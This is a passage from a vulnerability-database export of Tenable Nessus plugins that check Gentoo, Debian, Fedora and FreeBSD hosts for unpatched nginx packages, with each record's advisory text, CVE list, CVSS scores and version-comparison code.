http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(59614);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-3555\", \"CVE-2009-3896\", \"CVE-2009-3898\", \"CVE-2011-4315\", \"CVE-2012-1180\");\n script_bugtraq_id(36490, 36839, 36935, 50710, 52578);\n script_xref(name:\"GLSA\", value:\"201203-22\");\n\n script_name(english:\"GLSA-201203-22 : nginx: Multiple vulnerabilities\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-201203-22\n(nginx: Multiple vulnerabilities)\n\n Multiple vulnerabilities have been found in nginx:\n The TLS protocol does not properly handle session renegotiation\n requests (CVE-2009-3555).\n The 'ngx_http_process_request_headers()' function in ngx_http_parse.c\n could cause a NULL pointer dereference (CVE-2009-3896).\n nginx does not properly sanitize user input for the the WebDAV COPY\n or MOVE methods (CVE-2009-3898).\n The 'ngx_resolver_copy()' function in ngx_resolver.c contains a\n boundary error which could cause a heap-based buffer overflow\n (CVE-2011-4315).\n nginx does not properly parse HTTP header responses which could\n expose sensitive information (CVE-2012-1180).\n \nImpact :\n\n A remote attacker could possibly execute arbitrary code with the\n privileges of the nginx process, cause a Denial of Service condition,\n create or overwrite arbitrary files, or obtain sensitive information.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/201203-22\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All nginx users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/nginx-1.0.14'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(22, 119, 310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:nginx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2012/03/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2012/06/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2012-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/nginx\", unaffected:make_list(\"ge 1.0.14\"), vulnerable:make_list(\"lt 1.0.14\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:qpkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nginx\");\n}\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2021-01-06T09:45:39", "description": "Chris Ries discovered that nginx, a high-performance HTTP server,\nreverse proxy and IMAP/POP3 proxy server, is vulnerable to a buffer\nunderflow when processing certain HTTP requests. An attacker can use\nthis to execute arbitrary code with the rights of the worker process\n(www-data on Debian) or possibly perform denial of service attacks by\nrepeatedly crashing worker processes via a specially crafted URL in an\nHTTP request.", "edition": 26, "published": "2010-02-24T00:00:00", "title": "Debian DSA-1884-1 : nginx - buffer underflow", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2629"], "modified": "2010-02-24T00:00:00", "cpe": ["cpe:/o:debian:debian_linux:4.0", "cpe:/o:debian:debian_linux:5.0", "p-cpe:/a:debian:debian_linux:nginx"], "id": "DEBIAN_DSA-1884.NASL", "href": "https://www.tenable.com/plugins/nessus/44749", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-1884. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(44749);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2009-2629\");\n script_xref(name:\"DSA\", value:\"1884\");\n\n script_name(english:\"Debian DSA-1884-1 : nginx - buffer underflow\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Chris Ries discovered that nginx, a high-performance HTTP server,\nreverse proxy and IMAP/POP3 proxy server, is vulnerable to a buffer\nunderflow when processing certain HTTP requests. An attacker can use\nthis to execute arbitrary code with the rights of the worker process\n(www-data on Debian) or possibly perform denial of service attacks by\nrepeatedly crashing worker processes via a specially crafted URL in an\nHTTP request.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2009/dsa-1884\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the nginx packages.\n\nFor the oldstable distribution (etch), this problem has been fixed in\nversion 0.4.13-2+etch2.\n\nFor the stable distribution (lenny), this problem has been fixed in\nversion 0.6.32-3+lenny2.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:nginx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:5.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/02/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"4.0\", prefix:\"nginx\", reference:\"0.4.13-2+etch2\")) flag++;\nif (deb_check(release:\"5.0\", prefix:\"nginx\", reference:\"0.6.32-3+lenny2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:07:39", "description": " - Mon Sep 14 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.62-1\n\n - update to 0.7.62\n\n - fixes CVE-2009-2629\n\n - Sun Aug 2 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.61-1\n\n - update to new stable 0.7.61\n\n - remove third-party module\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2009-09-16T00:00:00", "title": "Fedora 11 : nginx-0.7.62-1.fc11 (2009-9630)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2629"], "modified": "2009-09-16T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:11", "p-cpe:/a:fedoraproject:fedora:nginx"], "id": "FEDORA_2009-9630.NASL", "href": "https://www.tenable.com/plugins/nessus/40995", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-9630.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40995);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2629\");\n script_bugtraq_id(36384);\n script_xref(name:\"FEDORA\", value:\"2009-9630\");\n\n script_name(english:\"Fedora 11 : nginx-0.7.62-1.fc11 (2009-9630)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Mon Sep 14 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.62-1\n\n - update to 0.7.62\n\n - fixes CVE-2009-2629\n\n - Sun Aug 2 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.61-1\n\n - update to new stable 0.7.61\n\n - remove third-party module\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=523105\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-September/029236.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e3cd718a\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected nginx package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:nginx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^11([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 11.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC11\", reference:\"nginx-0.7.62-1.fc11\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nginx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:52:34", "description": "The remote host is affected by the vulnerability described in GLSA-200909-18\n(nginx: Remote execution of arbitrary code)\n\n Chris Ries reported a heap-based buffer underflow in the\n ngx_http_parse_complex_uri() function in http/ngx_http_parse.c when\n parsing the request URI.\n \nImpact :\n\n A remote attacker might send a specially crafted request URI to a nginx\n server, possibly resulting in the remote execution of arbitrary code\n with the privileges of the user running the server, or a Denial of\n Service. NOTE: By default, nginx runs as the 'nginx' user.\n \nWorkaround :\n\n There is no known workaround at this time.", "edition": 25, "published": "2009-09-21T00:00:00", "title": "GLSA-200909-18 : nginx: Remote execution of arbitrary code", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2629"], "modified": "2009-09-21T00:00:00", "cpe": ["p-cpe:/a:gentoo:linux:nginx", "cpe:/o:gentoo:linux"], "id": "GENTOO_GLSA-200909-18.NASL", "href": "https://www.tenable.com/plugins/nessus/41022", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Gentoo Linux Security Advisory GLSA 200909-18.\n#\n# The advisory text is Copyright (C) 2001-2015 Gentoo Foundation, Inc.\n# and licensed under the Creative Commons - Attribution / Share Alike \n# license. See http://creativecommons.org/licenses/by-sa/3.0/\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41022);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-2629\");\n script_xref(name:\"GLSA\", value:\"200909-18\");\n\n script_name(english:\"GLSA-200909-18 : nginx: Remote execution of arbitrary code\");\n script_summary(english:\"Checks for updated package(s) in /var/db/pkg\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Gentoo host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote host is affected by the vulnerability described in GLSA-200909-18\n(nginx: Remote execution of arbitrary code)\n\n Chris Ries reported a heap-based buffer underflow in the\n ngx_http_parse_complex_uri() function in http/ngx_http_parse.c when\n parsing the request URI.\n \nImpact :\n\n A remote attacker might send a specially crafted request URI to a nginx\n server, possibly resulting in the remote execution of arbitrary code\n with the privileges of the user running the server, or a Denial of\n Service. NOTE: By default, nginx runs as the 'nginx' user.\n \nWorkaround :\n\n There is no known workaround at this time.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security.gentoo.org/glsa/200909-18\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"All nginx 0.5.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/nginx-0.5.38'\n All nginx 0.6.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/nginx-0.6.39'\n All nginx 0.7.x users should upgrade to the latest version:\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=www-servers/nginx-0.7.62'\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:gentoo:linux:nginx\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:gentoo:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/21\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Gentoo Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Gentoo/release\", \"Host/Gentoo/qpkg-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"qpkg.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Gentoo/release\")) audit(AUDIT_OS_NOT, \"Gentoo\");\nif (!get_kb_item(\"Host/Gentoo/qpkg-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (qpkg_check(package:\"www-servers/nginx\", unaffected:make_list(\"rge 0.5.38\", \"rge 0.6.39\", \"ge 0.7.62\"), vulnerable:make_list(\"lt 0.7.62\"))) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:qpkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = qpkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"nginx\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T10:40:02", "description": "nginx development team reports :\n\nA segmentation fault might occur in worker process while specially\ncrafted request handling.", "edition": 26, "published": "2009-09-15T00:00:00", "title": "FreeBSD : nginx -- remote denial of service vulnerability (152b27f0-a158-11de-990c-e5b1d4c882e0)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2629"], "modified": "2009-09-15T00:00:00", "cpe": ["cpe:/o:freebsd:freebsd", "p-cpe:/a:freebsd:freebsd:nginx-devel", "p-cpe:/a:freebsd:freebsd:nginx"], "id": "FREEBSD_PKG_152B27F0A15811DE990CE5B1D4C882E0.NASL", "href": "https://www.tenable.com/plugins/nessus/40978", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2018 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40978);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2009-2629\");\n\n script_name(english:\"FreeBSD : nginx -- remote denial of service vulnerability (152b27f0-a158-11de-990c-e5b1d4c882e0)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"nginx development team reports :\n\nA segmentation fault might occur in worker process while specially\ncrafted request handling.\"\n );\n # http://nginx.net/CHANGES\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://nginx.org/en/CHANGES\"\n );\n # http://lists.debian.org/debian-security-announce/2009/msg00205.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-security-announce/2009/msg00205.html\"\n );\n # https://vuxml.freebsd.org/freebsd/152b27f0-a158-11de-990c-e5b1d4c882e0.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?c163f1ea\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:nginx\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:nginx-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2009/09/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/09/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"nginx<0.7.62\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"nginx-devel<0.8.15\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:07:39", "description": " - Mon Sep 14 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.62-1\n\n - update to 0.7.62\n\n - fixes CVE-2009-2629\n\n - Sun Aug 2 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.61-1\n\n - update to new stable 0.7.61\n\n - remove third-party module\n\n - Sat Apr 11 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> 0.6.36-1\n\n - update to 0.6.36\n\n - Wed Feb 25 2009 Fedora Release Engineering <rel-eng at\n lists.fedoraproject.org> - 0.6.35-3\n\n - Rebuilt for\n https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n\n - Thu Feb 19 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.35-2\n\n - rebuild\n\n - Thu Feb 19 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.35-1\n\n - update to 0.6.35\n\n - Sat Jan 17 2009 Tomas Mraz <tmraz at redhat.com> -\n 0.6.34-2\n\n - rebuild with new openssl\n\n - Tue Dec 30 2008 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.34-1\n\n - update to 0.6.34\n\n - Thu Dec 4 2008 Michael Schwendt <mschwendt at\n fedoraproject.org> - 0.6.33-2\n\n - Fix inclusion of /usr/share/nginx tree => no unowned\n directories.\n\n - Sun Nov 23 2008 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.33-1\n\n - update to 0.6.33\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 24, "published": "2009-09-16T00:00:00", "title": "Fedora 10 : nginx-0.7.62-1.fc10 (2009-9652)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-2629"], "modified": "2009-09-16T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:10", "p-cpe:/a:fedoraproject:fedora:nginx"], "id": "FEDORA_2009-9652.NASL", "href": "https://www.tenable.com/plugins/nessus/40996", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-9652.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(40996);\n script_version(\"1.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2009-2629\");\n script_bugtraq_id(36384);\n script_xref(name:\"FEDORA\", value:\"2009-9652\");\n\n script_name(english:\"Fedora 10 : nginx-0.7.62-1.fc10 (2009-9652)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\" - Mon Sep 14 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.62-1\n\n - update to 0.7.62\n\n - fixes CVE-2009-2629\n\n - Sun Aug 2 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.7.61-1\n\n - update to new stable 0.7.61\n\n - remove third-party module\n\n - Sat Apr 11 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> 0.6.36-1\n\n - update to 0.6.36\n\n - Wed Feb 25 2009 Fedora Release Engineering <rel-eng at\n lists.fedoraproject.org> - 0.6.35-3\n\n - Rebuilt for\n https://fedoraproject.org/wiki/Fedora_11_Mass_Rebuild\n\n - Thu Feb 19 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.35-2\n\n - rebuild\n\n - Thu Feb 19 2009 Jeremy Hinegardner <jeremy at\n hinegardner dot org> - 0.6.35-1\n\n - update to 0.6.35\n\n - Sat Jan 17 2009 Tomas Mraz <tmraz at redhat.com> -\n 0.6.34-2\n\n - rebuild with new openssl\n\n - Tue 